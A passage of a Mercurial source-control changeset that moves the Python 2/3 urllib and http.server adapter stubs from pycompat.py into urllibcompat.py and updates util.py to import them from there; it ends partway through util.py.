urllibcompat: move some adapters from pycompat to urllibcompat...
Augie Fackler
r34468:192f7b12 default
@@ -1,463 +1,316 b''
1 1 # pycompat.py - portability shim for python 3
2 2 #
3 3 # This software may be used and distributed according to the terms of the
4 4 # GNU General Public License version 2 or any later version.
5 5
6 6 """Mercurial portability shim for python 3.
7 7
8 8 This contains aliases to hide python version-specific details from the core.
9 9 """
10 10
11 11 from __future__ import absolute_import
12 12
13 13 import getopt
14 14 import os
15 15 import shlex
16 16 import sys
17 17
18 18 ispy3 = (sys.version_info[0] >= 3)
19 19 ispypy = (r'__pypy__' in sys.builtin_module_names)
20 20
21 21 if not ispy3:
22 22 import cookielib
23 23 import cPickle as pickle
24 24 import httplib
25 25 import Queue as _queue
26 26 import SocketServer as socketserver
27 27 import xmlrpclib
28 28 else:
29 29 import http.cookiejar as cookielib
30 30 import http.client as httplib
31 31 import pickle
32 32 import queue as _queue
33 33 import socketserver
34 34 import xmlrpc.client as xmlrpclib
35 35
36 36 empty = _queue.Empty
37 37 queue = _queue.Queue
38 38
39 39 def identity(a):
40 40 return a
41 41
42 42 if ispy3:
43 43 import builtins
44 44 import functools
45 45 import io
46 46 import struct
47 47
48 48 fsencode = os.fsencode
49 49 fsdecode = os.fsdecode
50 50 oslinesep = os.linesep.encode('ascii')
51 51 osname = os.name.encode('ascii')
52 52 ospathsep = os.pathsep.encode('ascii')
53 53 ossep = os.sep.encode('ascii')
54 54 osaltsep = os.altsep
55 55 if osaltsep:
56 56 osaltsep = osaltsep.encode('ascii')
57 57 # os.getcwd() on Python 3 returns string, but it has os.getcwdb() which
58 58 # returns bytes.
59 59 getcwd = os.getcwdb
60 60 sysplatform = sys.platform.encode('ascii')
61 61 sysexecutable = sys.executable
62 62 if sysexecutable:
63 63 sysexecutable = os.fsencode(sysexecutable)
64 64 stringio = io.BytesIO
65 65 maplist = lambda *args: list(map(*args))
66 66 rawinput = input
67 67
68 68 # TODO: .buffer might not exist if std streams were replaced; we'll need
69 69 # a silly wrapper to make a bytes stream backed by a unicode one.
70 70 stdin = sys.stdin.buffer
71 71 stdout = sys.stdout.buffer
72 72 stderr = sys.stderr.buffer
73 73
74 74 # Since Python 3 converts argv to wchar_t type by Py_DecodeLocale() on Unix,
75 75 # we can use os.fsencode() to get back bytes argv.
76 76 #
77 77 # https://hg.python.org/cpython/file/v3.5.1/Programs/python.c#l55
78 78 #
79 79 # TODO: On Windows, the native argv is wchar_t, so we'll need a different
80 80 # workaround to simulate the Python 2 (i.e. ANSI Win32 API) behavior.
81 81 if getattr(sys, 'argv', None) is not None:
82 82 sysargv = list(map(os.fsencode, sys.argv))
83 83
84 84 bytechr = struct.Struct('>B').pack
85 85
86 86 class bytestr(bytes):
87 87 """A bytes which mostly acts as a Python 2 str
88 88
89 89 >>> bytestr(), bytestr(bytearray(b'foo')), bytestr(u'ascii'), bytestr(1)
90 90 (b'', b'foo', b'ascii', b'1')
91 91 >>> s = bytestr(b'foo')
92 92 >>> assert s is bytestr(s)
93 93
94 94 __bytes__() should be called if provided:
95 95
96 96 >>> class bytesable(object):
97 97 ... def __bytes__(self):
98 98 ... return b'bytes'
99 99 >>> bytestr(bytesable())
100 100 b'bytes'
101 101
102 102 There's no implicit conversion from non-ascii str as its encoding is
103 103 unknown:
104 104
105 105 >>> bytestr(chr(0x80)) # doctest: +ELLIPSIS
106 106 Traceback (most recent call last):
107 107 ...
108 108 UnicodeEncodeError: ...
109 109
110 110 Comparison between bytestr and bytes should work:
111 111
112 112 >>> assert bytestr(b'foo') == b'foo'
113 113 >>> assert b'foo' == bytestr(b'foo')
114 114 >>> assert b'f' in bytestr(b'foo')
115 115 >>> assert bytestr(b'f') in b'foo'
116 116
117 117 Sliced elements should be bytes, not integer:
118 118
119 119 >>> s[1], s[:2]
120 120 (b'o', b'fo')
121 121 >>> list(s), list(reversed(s))
122 122 ([b'f', b'o', b'o'], [b'o', b'o', b'f'])
123 123
124 124 As bytestr type isn't propagated across operations, you need to cast
125 125 bytes to bytestr explicitly:
126 126
127 127 >>> s = bytestr(b'foo').upper()
128 128 >>> t = bytestr(s)
129 129 >>> s[0], t[0]
130 130 (70, b'F')
131 131
132 132 Be careful to not pass a bytestr object to a function which expects
133 133 bytearray-like behavior.
134 134
135 135 >>> t = bytes(t) # cast to bytes
136 136 >>> assert type(t) is bytes
137 137 """
138 138
139 139 def __new__(cls, s=b''):
140 140 if isinstance(s, bytestr):
141 141 return s
142 142 if (not isinstance(s, (bytes, bytearray))
143 143 and not hasattr(s, u'__bytes__')): # hasattr-py3-only
144 144 s = str(s).encode(u'ascii')
145 145 return bytes.__new__(cls, s)
146 146
147 147 def __getitem__(self, key):
148 148 s = bytes.__getitem__(self, key)
149 149 if not isinstance(s, bytes):
150 150 s = bytechr(s)
151 151 return s
152 152
153 153 def __iter__(self):
154 154 return iterbytestr(bytes.__iter__(self))
155 155
156 156 def iterbytestr(s):
157 157 """Iterate bytes as if it were a str object of Python 2"""
158 158 return map(bytechr, s)
159 159
160 160 def sysbytes(s):
161 161 """Convert an internal str (e.g. keyword, __doc__) back to bytes
162 162
163 163 This never raises UnicodeEncodeError, but only ASCII characters
164 164 can be round-tripped by sysstr(sysbytes(s)).
165 165 """
166 166 return s.encode(u'utf-8')
167 167
168 168 def sysstr(s):
169 169 """Return a keyword str to be passed to Python functions such as
170 170 getattr() and str.encode()
171 171
172 172 This never raises UnicodeDecodeError. Non-ascii characters are
173 173 considered invalid and mapped to arbitrary but unique code points
174 174 such that 'sysstr(a) != sysstr(b)' for all 'a != b'.
175 175 """
176 176 if isinstance(s, builtins.str):
177 177 return s
178 178 return s.decode(u'latin-1')
179 179
180 180 def strurl(url):
181 181 """Converts a bytes url back to str"""
182 182 return url.decode(u'ascii')
183 183
184 184 def bytesurl(url):
185 185 """Converts a str url to bytes by encoding in ascii"""
186 186 return url.encode(u'ascii')
187 187
188 188 def raisewithtb(exc, tb):
189 189 """Raise exception with the given traceback"""
190 190 raise exc.with_traceback(tb)
191 191
192 192 def getdoc(obj):
193 193 """Get docstring as bytes; may be None so gettext() won't confuse it
194 194 with _('')"""
195 195 doc = getattr(obj, u'__doc__', None)
196 196 if doc is None:
197 197 return doc
198 198 return sysbytes(doc)
199 199
200 200 def _wrapattrfunc(f):
201 201 @functools.wraps(f)
202 202 def w(object, name, *args):
203 203 return f(object, sysstr(name), *args)
204 204 return w
205 205
206 206 # these wrappers are automagically imported by hgloader
207 207 delattr = _wrapattrfunc(builtins.delattr)
208 208 getattr = _wrapattrfunc(builtins.getattr)
209 209 hasattr = _wrapattrfunc(builtins.hasattr)
210 210 setattr = _wrapattrfunc(builtins.setattr)
211 211 xrange = builtins.range
212 212 unicode = str
213 213
214 214 def open(name, mode='r', buffering=-1):
215 215 return builtins.open(name, sysstr(mode), buffering)
216 216
217 217 def getoptb(args, shortlist, namelist):
218 218 """
219 219 Takes bytes arguments, converts them to unicode, passes them to
220 220 getopt.getopt(), converts the returned values back to bytes, and then
221 221 returns them, for Python 3 compatibility, as getopt.getopt() doesn't
222 222 accept bytes on Python 3.
223 223 """
224 224 args = [a.decode('latin-1') for a in args]
225 225 shortlist = shortlist.decode('latin-1')
226 226 namelist = [a.decode('latin-1') for a in namelist]
227 227 opts, args = getopt.getopt(args, shortlist, namelist)
228 228 opts = [(a[0].encode('latin-1'), a[1].encode('latin-1'))
229 229 for a in opts]
230 230 args = [a.encode('latin-1') for a in args]
231 231 return opts, args
232 232
233 233 def strkwargs(dic):
234 234 """
235 235 Converts the keys of a python dictionary to str (i.e. unicode) so that
236 236 they can be passed as keyword arguments, as dictionaries with bytes keys
237 237 can't be passed as keyword arguments to functions on Python 3.
238 238 """
239 239 dic = dict((k.decode('latin-1'), v) for k, v in dic.iteritems())
240 240 return dic
241 241
242 242 def byteskwargs(dic):
243 243 """
244 244 Converts keys of python dictionaries back to bytes, as they were converted
245 245 to str to pass that dictionary as keyword arguments on Python 3.
246 246 """
247 247 dic = dict((k.encode('latin-1'), v) for k, v in dic.iteritems())
248 248 return dic
249 249
250 250 # TODO: handle shlex.shlex().
251 251 def shlexsplit(s):
252 252 """
253 253 Takes a bytes argument, converts it to str (i.e. unicode), passes that into
254 254 shlex.split(), converts the returned value back to bytes, and returns it for
255 255 Python 3 compatibility, as shlex.split() doesn't accept bytes on Python 3.
256 256 """
257 257 ret = shlex.split(s.decode('latin-1'))
258 258 return [a.encode('latin-1') for a in ret]
259 259
260 260 else:
261 261 import cStringIO
262 262
263 263 bytechr = chr
264 264 bytestr = str
265 265 iterbytestr = iter
266 266 sysbytes = identity
267 267 sysstr = identity
268 268 strurl = identity
269 269 bytesurl = identity
270 270
271 271 # this can't be parsed on Python 3
272 272 exec('def raisewithtb(exc, tb):\n'
273 273 ' raise exc, None, tb\n')
274 274
275 275 def fsencode(filename):
276 276 """
277 277 Partial backport from os.py in Python 3, which only accepts bytes.
278 278 In Python 2, our paths should only ever be bytes; a unicode path
279 279 indicates a bug.
280 280 """
281 281 if isinstance(filename, str):
282 282 return filename
283 283 else:
284 284 raise TypeError(
285 285 "expect str, not %s" % type(filename).__name__)
286 286
287 287 # In Python 2, fsdecode() is very likely to receive bytes, so it's
288 288 # better not to touch the Python 2 part as it's already working fine.
289 289 fsdecode = identity
290 290
291 291 def getdoc(obj):
292 292 return getattr(obj, '__doc__', None)
293 293
294 294 def getoptb(args, shortlist, namelist):
295 295 return getopt.getopt(args, shortlist, namelist)
296 296
297 297 strkwargs = identity
298 298 byteskwargs = identity
299 299
300 300 oslinesep = os.linesep
301 301 osname = os.name
302 302 ospathsep = os.pathsep
303 303 ossep = os.sep
304 304 osaltsep = os.altsep
305 305 stdin = sys.stdin
306 306 stdout = sys.stdout
307 307 stderr = sys.stderr
308 308 if getattr(sys, 'argv', None) is not None:
309 309 sysargv = sys.argv
310 310 sysplatform = sys.platform
311 311 getcwd = os.getcwd
312 312 sysexecutable = sys.executable
313 313 shlexsplit = shlex.split
314 314 stringio = cStringIO.StringIO
315 315 maplist = map
316 316 rawinput = raw_input
317
318 class _pycompatstub(object):
319 def __init__(self):
320 self._aliases = {}
321
322 def _registeraliases(self, origin, items):
323 """Add items that will be populated at the first access"""
324 items = map(sysstr, items)
325 self._aliases.update(
326 (item.replace(sysstr('_'), sysstr('')).lower(), (origin, item))
327 for item in items)
328
329 def _registeralias(self, origin, attr, name):
330 """Alias ``origin``.``attr`` as ``name``"""
331 self._aliases[sysstr(name)] = (origin, sysstr(attr))
332
333 def __getattr__(self, name):
334 try:
335 origin, item = self._aliases[name]
336 except KeyError:
337 raise AttributeError(name)
338 self.__dict__[name] = obj = getattr(origin, item)
339 return obj
340
341 httpserver = _pycompatstub()
342 urlreq = _pycompatstub()
343 urlerr = _pycompatstub()
344 if not ispy3:
345 import BaseHTTPServer
346 import CGIHTTPServer
347 import SimpleHTTPServer
348 import urllib2
349 import urllib
350 import urlparse
351 urlreq._registeraliases(urllib, (
352 "addclosehook",
353 "addinfourl",
354 "ftpwrapper",
355 "pathname2url",
356 "quote",
357 "splitattr",
358 "splitpasswd",
359 "splitport",
360 "splituser",
361 "unquote",
362 "url2pathname",
363 "urlencode",
364 ))
365 urlreq._registeraliases(urllib2, (
366 "AbstractHTTPHandler",
367 "BaseHandler",
368 "build_opener",
369 "FileHandler",
370 "FTPHandler",
371 "HTTPBasicAuthHandler",
372 "HTTPDigestAuthHandler",
373 "HTTPHandler",
374 "HTTPPasswordMgrWithDefaultRealm",
375 "HTTPSHandler",
376 "install_opener",
377 "ProxyHandler",
378 "Request",
379 "urlopen",
380 ))
381 urlreq._registeraliases(urlparse, (
382 "urlparse",
383 "urlunparse",
384 ))
385 urlerr._registeraliases(urllib2, (
386 "HTTPError",
387 "URLError",
388 ))
389 httpserver._registeraliases(BaseHTTPServer, (
390 "HTTPServer",
391 "BaseHTTPRequestHandler",
392 ))
393 httpserver._registeraliases(SimpleHTTPServer, (
394 "SimpleHTTPRequestHandler",
395 ))
396 httpserver._registeraliases(CGIHTTPServer, (
397 "CGIHTTPRequestHandler",
398 ))
399
400 else:
401 import urllib.parse
402 urlreq._registeraliases(urllib.parse, (
403 "splitattr",
404 "splitpasswd",
405 "splitport",
406 "splituser",
407 "urlparse",
408 "urlunparse",
409 ))
410 urlreq._registeralias(urllib.parse, "unquote_to_bytes", "unquote")
411 import urllib.request
412 urlreq._registeraliases(urllib.request, (
413 "AbstractHTTPHandler",
414 "BaseHandler",
415 "build_opener",
416 "FileHandler",
417 "FTPHandler",
418 "ftpwrapper",
419 "HTTPHandler",
420 "HTTPSHandler",
421 "install_opener",
422 "pathname2url",
423 "HTTPBasicAuthHandler",
424 "HTTPDigestAuthHandler",
425 "HTTPPasswordMgrWithDefaultRealm",
426 "ProxyHandler",
427 "Request",
428 "url2pathname",
429 "urlopen",
430 ))
431 import urllib.response
432 urlreq._registeraliases(urllib.response, (
433 "addclosehook",
434 "addinfourl",
435 ))
436 import urllib.error
437 urlerr._registeraliases(urllib.error, (
438 "HTTPError",
439 "URLError",
440 ))
441 import http.server
442 httpserver._registeraliases(http.server, (
443 "HTTPServer",
444 "BaseHTTPRequestHandler",
445 "SimpleHTTPRequestHandler",
446 "CGIHTTPRequestHandler",
447 ))
448
449 # urllib.parse.quote() accepts both str and bytes, decodes bytes
450 # (if necessary), and returns str. This is wonky. We provide a custom
451 # implementation that only accepts bytes and emits bytes.
452 def quote(s, safe=r'/'):
453 s = urllib.parse.quote_from_bytes(s, safe=safe)
454 return s.encode('ascii', 'strict')
455
456 # urllib.parse.urlencode() returns str. We use this function to make
457 # sure we return bytes.
458 def urlencode(query, doseq=False):
459 s = urllib.parse.urlencode(query, doseq=doseq)
460 return s.encode('ascii')
461
462 urlreq.quote = quote
463 urlreq.urlencode = urlencode
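A minimal usage sketch of the byte/str adapters that stay behind in pycompat.py after this change (not part of the changeset; it assumes Python 3 and that mercurial.pycompat is importable, and the values are purely illustrative):

    from mercurial import pycompat

    # bytestr restores Python 2 str semantics on top of bytes: indexing
    # yields one-byte bytes objects instead of integers.
    s = pycompat.bytestr(b'foo')
    assert s[0] == b'f' and s[:2] == b'fo'
    assert list(s) == [b'f', b'o', b'o']

    # sysstr()/sysbytes() cross the bytes<->str boundary for stdlib APIs
    # that insist on str; only ASCII survives the round trip exactly.
    assert pycompat.sysbytes(pycompat.sysstr(b'tip')) == b'tip'

    # shlexsplit() accepts and returns bytes, unlike shlex.split() on
    # Python 3, which only handles str.
    assert pycompat.shlexsplit(b'hg log -r tip') == [b'hg', b'log', b'-r', b'tip']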
@@ -1,42 +1,188 b''
1 1 # urllibcompat.py - adapters to ease using urllib2 on Py2 and urllib on Py3
2 2 #
3 3 # Copyright 2017 Google, Inc.
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7 from __future__ import absolute_import
8 8
9 9 from . import pycompat
10 10
11 _sysstr = pycompat.sysstr
12
13 class _pycompatstub(object):
14 def __init__(self):
15 self._aliases = {}
16
17 def _registeraliases(self, origin, items):
18 """Add items that will be populated at the first access"""
19 items = map(_sysstr, items)
20 self._aliases.update(
21 (item.replace(_sysstr('_'), _sysstr('')).lower(), (origin, item))
22 for item in items)
23
24 def _registeralias(self, origin, attr, name):
25 """Alias ``origin``.``attr`` as ``name``"""
26 self._aliases[_sysstr(name)] = (origin, _sysstr(attr))
27
28 def __getattr__(self, name):
29 try:
30 origin, item = self._aliases[name]
31 except KeyError:
32 raise AttributeError(name)
33 self.__dict__[name] = obj = getattr(origin, item)
34 return obj
35
36 httpserver = _pycompatstub()
37 urlreq = _pycompatstub()
38 urlerr = _pycompatstub()
39
11 40 if pycompat.ispy3:
41 import urllib.parse
42 urlreq._registeraliases(urllib.parse, (
43 "splitattr",
44 "splitpasswd",
45 "splitport",
46 "splituser",
47 "urlparse",
48 "urlunparse",
49 ))
50 urlreq._registeralias(urllib.parse, "unquote_to_bytes", "unquote")
51 import urllib.request
52 urlreq._registeraliases(urllib.request, (
53 "AbstractHTTPHandler",
54 "BaseHandler",
55 "build_opener",
56 "FileHandler",
57 "FTPHandler",
58 "ftpwrapper",
59 "HTTPHandler",
60 "HTTPSHandler",
61 "install_opener",
62 "pathname2url",
63 "HTTPBasicAuthHandler",
64 "HTTPDigestAuthHandler",
65 "HTTPPasswordMgrWithDefaultRealm",
66 "ProxyHandler",
67 "Request",
68 "url2pathname",
69 "urlopen",
70 ))
71 import urllib.response
72 urlreq._registeraliases(urllib.response, (
73 "addclosehook",
74 "addinfourl",
75 ))
76 import urllib.error
77 urlerr._registeraliases(urllib.error, (
78 "HTTPError",
79 "URLError",
80 ))
81 import http.server
82 httpserver._registeraliases(http.server, (
83 "HTTPServer",
84 "BaseHTTPRequestHandler",
85 "SimpleHTTPRequestHandler",
86 "CGIHTTPRequestHandler",
87 ))
88
89 # urllib.parse.quote() accepts both str and bytes, decodes bytes
90 # (if necessary), and returns str. This is wonky. We provide a custom
91 # implementation that only accepts bytes and emits bytes.
92 def quote(s, safe=r'/'):
93 s = urllib.parse.quote_from_bytes(s, safe=safe)
94 return s.encode('ascii', 'strict')
95
96 # urllib.parse.urlencode() returns str. We use this function to make
97 # sure we return bytes.
98 def urlencode(query, doseq=False):
99 s = urllib.parse.urlencode(query, doseq=doseq)
100 return s.encode('ascii')
101
102 urlreq.quote = quote
103 urlreq.urlencode = urlencode
12 104
13 105 def getfullurl(req):
14 106 return req.full_url
15 107
16 108 def gethost(req):
17 109 return req.host
18 110
19 111 def getselector(req):
20 112 return req.selector
21 113
22 114 def getdata(req):
23 115 return req.data
24 116
25 117 def hasdata(req):
26 118 return req.data is not None
27 119 else:
120 import BaseHTTPServer
121 import CGIHTTPServer
122 import SimpleHTTPServer
123 import urllib2
124 import urllib
125 import urlparse
126 urlreq._registeraliases(urllib, (
127 "addclosehook",
128 "addinfourl",
129 "ftpwrapper",
130 "pathname2url",
131 "quote",
132 "splitattr",
133 "splitpasswd",
134 "splitport",
135 "splituser",
136 "unquote",
137 "url2pathname",
138 "urlencode",
139 ))
140 urlreq._registeraliases(urllib2, (
141 "AbstractHTTPHandler",
142 "BaseHandler",
143 "build_opener",
144 "FileHandler",
145 "FTPHandler",
146 "HTTPBasicAuthHandler",
147 "HTTPDigestAuthHandler",
148 "HTTPHandler",
149 "HTTPPasswordMgrWithDefaultRealm",
150 "HTTPSHandler",
151 "install_opener",
152 "ProxyHandler",
153 "Request",
154 "urlopen",
155 ))
156 urlreq._registeraliases(urlparse, (
157 "urlparse",
158 "urlunparse",
159 ))
160 urlerr._registeraliases(urllib2, (
161 "HTTPError",
162 "URLError",
163 ))
164 httpserver._registeraliases(BaseHTTPServer, (
165 "HTTPServer",
166 "BaseHTTPRequestHandler",
167 ))
168 httpserver._registeraliases(SimpleHTTPServer, (
169 "SimpleHTTPRequestHandler",
170 ))
171 httpserver._registeraliases(CGIHTTPServer, (
172 "CGIHTTPRequestHandler",
173 ))
28 174
29 175 def gethost(req):
30 176 return req.get_host()
31 177
32 178 def getselector(req):
33 179 return req.get_selector()
34 180
35 181 def getfullurl(req):
36 182 return req.get_full_url()
37 183
38 184 def getdata(req):
39 185 return req.get_data()
40 186
41 187 def hasdata(req):
42 188 return req.has_data()
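The _pycompatstub indirection above resolves aliases lazily: the first attribute access consults _aliases, caches the resolved object in __dict__, and later accesses never reach __getattr__ again. A minimal end-to-end sketch (not part of the changeset; it assumes mercurial.urllibcompat is importable, and the example.com URL is illustrative):

    from mercurial import urllibcompat

    urlreq = urllibcompat.urlreq

    # 'request' is the lowercased, underscore-stripped alias of 'Request';
    # this first access resolves and caches urllib.request.Request (Py3)
    # or urllib2.Request (Py2).
    req = urlreq.request('https://example.com/repo?cmd=capabilities',
                         data=b'payload')

    # The get*/has* helpers paper over the API split: method calls such as
    # req.get_full_url() on Python 2 versus attributes such as req.full_url
    # on Python 3.
    assert urllibcompat.hasdata(req)
    assert urllibcompat.getdata(req) == b'payload'
    assert urllibcompat.gethost(req) == 'example.com'
    assert urllibcompat.getselector(req) == '/repo?cmd=capabilities'

    # quote()/urlencode() stay bytes-in/bytes-out on Python 3, unlike the
    # str-returning stdlib versions (see the comment in the hunk above).
    assert urlreq.quote(b'a b/c') == b'a%20b/c'
    assert urlreq.urlencode([(b'cmd', b'batch')]) == b'cmd=batch'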
@@ -1,3835 +1,3837 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import calendar
21 21 import codecs
22 22 import collections
23 23 import contextlib
24 24 import datetime
25 25 import errno
26 26 import gc
27 27 import hashlib
28 28 import imp
29 29 import mmap
30 30 import os
31 31 import platform as pyplatform
32 32 import re as remod
33 33 import shutil
34 34 import signal
35 35 import socket
36 36 import stat
37 37 import string
38 38 import subprocess
39 39 import sys
40 40 import tempfile
41 41 import textwrap
42 42 import time
43 43 import traceback
44 44 import warnings
45 45 import zlib
46 46
47 47 from . import (
48 48 encoding,
49 49 error,
50 50 i18n,
51 51 policy,
52 52 pycompat,
53 urllibcompat,
53 54 )
54 55
55 56 base85 = policy.importmod(r'base85')
56 57 osutil = policy.importmod(r'osutil')
57 58 parsers = policy.importmod(r'parsers')
58 59
59 60 b85decode = base85.b85decode
60 61 b85encode = base85.b85encode
61 62
62 63 cookielib = pycompat.cookielib
63 64 empty = pycompat.empty
64 65 httplib = pycompat.httplib
65 httpserver = pycompat.httpserver
66 66 pickle = pycompat.pickle
67 67 queue = pycompat.queue
68 68 socketserver = pycompat.socketserver
69 69 stderr = pycompat.stderr
70 70 stdin = pycompat.stdin
71 71 stdout = pycompat.stdout
72 72 stringio = pycompat.stringio
73 urlerr = pycompat.urlerr
74 urlreq = pycompat.urlreq
75 73 xmlrpclib = pycompat.xmlrpclib
76 74
75 httpserver = urllibcompat.httpserver
76 urlerr = urllibcompat.urlerr
77 urlreq = urllibcompat.urlreq
78
77 79 # workaround for win32mbcs
78 80 _filenamebytestr = pycompat.bytestr
79 81
80 82 def isatty(fp):
81 83 try:
82 84 return fp.isatty()
83 85 except AttributeError:
84 86 return False
85 87
86 88 # glibc determines buffering on first write to stdout - if we replace a TTY
87 89 # destined stdout with a pipe destined stdout (e.g. pager), we want line
88 90 # buffering
89 91 if isatty(stdout):
90 92 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
91 93
92 94 if pycompat.osname == 'nt':
93 95 from . import windows as platform
94 96 stdout = platform.winstdout(stdout)
95 97 else:
96 98 from . import posix as platform
97 99
98 100 _ = i18n._
99 101
100 102 bindunixsocket = platform.bindunixsocket
101 103 cachestat = platform.cachestat
102 104 checkexec = platform.checkexec
103 105 checklink = platform.checklink
104 106 copymode = platform.copymode
105 107 executablepath = platform.executablepath
106 108 expandglobs = platform.expandglobs
107 109 explainexit = platform.explainexit
108 110 findexe = platform.findexe
109 111 gethgcmd = platform.gethgcmd
110 112 getuser = platform.getuser
111 113 getpid = os.getpid
112 114 groupmembers = platform.groupmembers
113 115 groupname = platform.groupname
114 116 hidewindow = platform.hidewindow
115 117 isexec = platform.isexec
116 118 isowner = platform.isowner
117 119 listdir = osutil.listdir
118 120 localpath = platform.localpath
119 121 lookupreg = platform.lookupreg
120 122 makedir = platform.makedir
121 123 nlinks = platform.nlinks
122 124 normpath = platform.normpath
123 125 normcase = platform.normcase
124 126 normcasespec = platform.normcasespec
125 127 normcasefallback = platform.normcasefallback
126 128 openhardlinks = platform.openhardlinks
127 129 oslink = platform.oslink
128 130 parsepatchoutput = platform.parsepatchoutput
129 131 pconvert = platform.pconvert
130 132 poll = platform.poll
131 133 popen = platform.popen
132 134 posixfile = platform.posixfile
133 135 quotecommand = platform.quotecommand
134 136 readpipe = platform.readpipe
135 137 rename = platform.rename
136 138 removedirs = platform.removedirs
137 139 samedevice = platform.samedevice
138 140 samefile = platform.samefile
139 141 samestat = platform.samestat
140 142 setbinary = platform.setbinary
141 143 setflags = platform.setflags
142 144 setsignalhandler = platform.setsignalhandler
143 145 shellquote = platform.shellquote
144 146 spawndetached = platform.spawndetached
145 147 split = platform.split
146 148 sshargs = platform.sshargs
147 149 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
148 150 statisexec = platform.statisexec
149 151 statislink = platform.statislink
150 152 testpid = platform.testpid
151 153 umask = platform.umask
152 154 unlink = platform.unlink
153 155 username = platform.username
154 156
155 157 try:
156 158 recvfds = osutil.recvfds
157 159 except AttributeError:
158 160 pass
159 161 try:
160 162 setprocname = osutil.setprocname
161 163 except AttributeError:
162 164 pass
163 165
164 166 # Python compatibility
165 167
166 168 _notset = object()
167 169
168 170 # disable Python's problematic floating point timestamps (issue4836)
169 171 # (Python hypocritically says you shouldn't change this behavior in
170 172 # libraries, and sure enough Mercurial is not a library.)
171 173 os.stat_float_times(False)
172 174
173 175 def safehasattr(thing, attr):
174 176 return getattr(thing, attr, _notset) is not _notset
175 177
176 178 def bytesinput(fin, fout, *args, **kwargs):
177 179 sin, sout = sys.stdin, sys.stdout
178 180 try:
179 181 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
180 182 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
181 183 finally:
182 184 sys.stdin, sys.stdout = sin, sout
183 185
184 186 def bitsfrom(container):
185 187 bits = 0
186 188 for bit in container:
187 189 bits |= bit
188 190 return bits
189 191
190 192 # python 2.6 still has deprecation warnings enabled by default. We do not want
191 193 # to display anything to standard users, so detect if we are running tests and
192 194 # only use python deprecation warnings in that case.
193 195 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
194 196 if _dowarn:
195 197 # explicitly unfilter our warning for python 2.7
196 198 #
197 199 # The option of setting PYTHONWARNINGS in the test runner was investigated.
198 200 # However, module names set through PYTHONWARNINGS were matched exactly, so
199 201 # we cannot set 'mercurial' and have it match e.g. 'mercurial.scmutil'. This
200 202 # makes the whole PYTHONWARNINGS thing useless for our use case.
201 203 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
202 204 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
203 205 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
204 206
205 207 def nouideprecwarn(msg, version, stacklevel=1):
206 208 """Issue an python native deprecation warning
207 209
208 210 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
209 211 """
210 212 if _dowarn:
211 213 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
212 214 " update your code.)") % version
213 215 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
214 216
215 217 DIGESTS = {
216 218 'md5': hashlib.md5,
217 219 'sha1': hashlib.sha1,
218 220 'sha512': hashlib.sha512,
219 221 }
220 222 # List of digest types from strongest to weakest
221 223 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
222 224
223 225 for k in DIGESTS_BY_STRENGTH:
224 226 assert k in DIGESTS
225 227
226 228 class digester(object):
227 229 """helper to compute digests.
228 230
229 231 This helper can be used to compute one or more digests given their name.
230 232
231 233 >>> d = digester([b'md5', b'sha1'])
232 234 >>> d.update(b'foo')
233 235 >>> [k for k in sorted(d)]
234 236 ['md5', 'sha1']
235 237 >>> d[b'md5']
236 238 'acbd18db4cc2f85cedef654fccc4a4d8'
237 239 >>> d[b'sha1']
238 240 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
239 241 >>> digester.preferred([b'md5', b'sha1'])
240 242 'sha1'
241 243 """
242 244
243 245 def __init__(self, digests, s=''):
244 246 self._hashes = {}
245 247 for k in digests:
246 248 if k not in DIGESTS:
247 249 raise Abort(_('unknown digest type: %s') % k)
248 250 self._hashes[k] = DIGESTS[k]()
249 251 if s:
250 252 self.update(s)
251 253
252 254 def update(self, data):
253 255 for h in self._hashes.values():
254 256 h.update(data)
255 257
256 258 def __getitem__(self, key):
257 259 if key not in DIGESTS:
258 260 raise Abort(_('unknown digest type: %s') % k)
259 261 return self._hashes[key].hexdigest()
260 262
261 263 def __iter__(self):
262 264 return iter(self._hashes)
263 265
264 266 @staticmethod
265 267 def preferred(supported):
266 268 """returns the strongest digest type in both supported and DIGESTS."""
267 269
268 270 for k in DIGESTS_BY_STRENGTH:
269 271 if k in supported:
270 272 return k
271 273 return None
272 274
273 275 class digestchecker(object):
274 276 """file handle wrapper that additionally checks content against a given
275 277 size and digests.
276 278
277 279 d = digestchecker(fh, size, {'md5': '...'})
278 280
279 281 When multiple digests are given, all of them are validated.
280 282 """
281 283
282 284 def __init__(self, fh, size, digests):
283 285 self._fh = fh
284 286 self._size = size
285 287 self._got = 0
286 288 self._digests = dict(digests)
287 289 self._digester = digester(self._digests.keys())
288 290
289 291 def read(self, length=-1):
290 292 content = self._fh.read(length)
291 293 self._digester.update(content)
292 294 self._got += len(content)
293 295 return content
294 296
295 297 def validate(self):
296 298 if self._size != self._got:
297 299 raise Abort(_('size mismatch: expected %d, got %d') %
298 300 (self._size, self._got))
299 301 for k, v in self._digests.items():
300 302 if v != self._digester[k]:
301 303 # i18n: first parameter is a digest name
302 304 raise Abort(_('%s mismatch: expected %s, got %s') %
303 305 (k, v, self._digester[k]))
304 306
305 307 try:
306 308 buffer = buffer
307 309 except NameError:
308 310 def buffer(sliceable, offset=0, length=None):
309 311 if length is not None:
